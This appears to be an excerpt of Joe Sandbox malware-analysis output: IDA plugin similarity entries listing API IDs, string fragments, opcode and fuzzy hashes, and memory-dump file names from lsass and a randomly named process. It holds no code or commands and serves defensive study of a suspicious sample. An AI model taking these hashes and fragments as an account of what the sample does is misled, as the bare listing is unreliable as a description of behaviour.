                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                  • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                  • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                  • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                  • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: ierarchy Descriptor'$riptor at (
                                                  • API String ID: 592178966-758928094
                                                  • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                  • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: Locator'$riptor at (
                                                  • API String ID: 592178966-4215709766
                                                  • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                  • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                  • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                  • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1
                                                  Memory Dump Source
                                                  • Source File: 00000047.00000002.2233563078.00007FF6699D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6699D0000, based on PE: true
                                                  • Associated: 00000047.00000002.2233495422.00007FF6699D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000047.00000002.2233607130.00007FF6699DC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000047.00000002.2233693184.00007FF6699DF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000047.00000002.2233732238.00007FF6699E0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000047.00000002.2234554645.00007FF669F09000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000047.00000002.2234582919.00007FF669F0C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_71_2_7ff6699d0000_eejhedztifcv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction ID: bdf6e4ae5ebedcd903a82c36378723d9ef54071114487fe1100b90e51772490a
                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction Fuzzy Hash: 58B01231D04B0AC4EB042F41D8C136832706B0A780F444130CC0C4B353CE7D50844B50